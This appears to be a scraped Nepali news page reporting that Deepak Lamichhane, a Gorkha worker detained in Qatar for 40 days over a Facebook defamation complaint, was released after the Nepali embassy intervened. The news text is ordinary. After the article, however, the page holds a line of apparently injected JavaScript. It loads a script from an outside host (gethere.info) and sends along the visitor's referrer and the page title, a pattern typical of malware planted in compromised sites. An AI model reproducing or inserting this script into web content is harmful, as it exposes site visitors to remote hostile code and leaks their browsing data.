फेसबुकमा कमेन्ट गरेको भरमै देश निकाला गर्न लागिएका दीपक अन्ततः जोगिए

commentकाठमाडौं, असोज ११ – फेसबुकमा कमेन्ट गरेको अभियोगमा कतारबाट डिपोर्ट गर्न पक्राउ परेका गोरखाका दीपक लामिछानेलाई ४० दिनपछि सोमबार बिहान रिहा गरिएको छ । दीपक १४ वर्षदेखि कतारमा कार्यरत छन् ।

अस्ट्रेलियामा बस्ने दीपा राईको नामबाट दीपकविरुद्ध उजुरी परेपछि कतार प्रहरीले छानबिन गरी उनलाई अगस्ट १६ मा पक्राउ गरी डिपोर्टेसन सेन्टरमा राखेको थियो । उजुरीमा दीपकले आफूमाथि मानहानि हुने गरी फेसबुकमा कमेन्ट तथा सन्देश पठाएको उल्लेख छ ।

‘नेपाली दूतावासको प्रयासमा डिपोर्ट हुनबाट जोगिएँ । दूतावासले आफ्नो देशको नागरिकको हितप्रति खेलेको भूमिकाप्रति आभारी छु,’ लामिछानेले भने, मैले कतारमा ढिलै भए पनि काम गर्ने अवसर पाएको छु । ढिलै भए पनि न्याय पाएँ ।’ कतारस्थित नेपाली दूतावासले एउटा सामान्य नेपाली कामदारलाई डिपोर्ट गर्न नहुने भन्दै तत्काल कतारको परराष्ट्र मन्त्रालयमा ध्यानाकर्षण जनाएपछि उनलाई डिपोर्ट नगरी हिरासतमै राखिएको थियो । आजको कान्तिपुर दैनिकमा खबर छ ।

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Loading...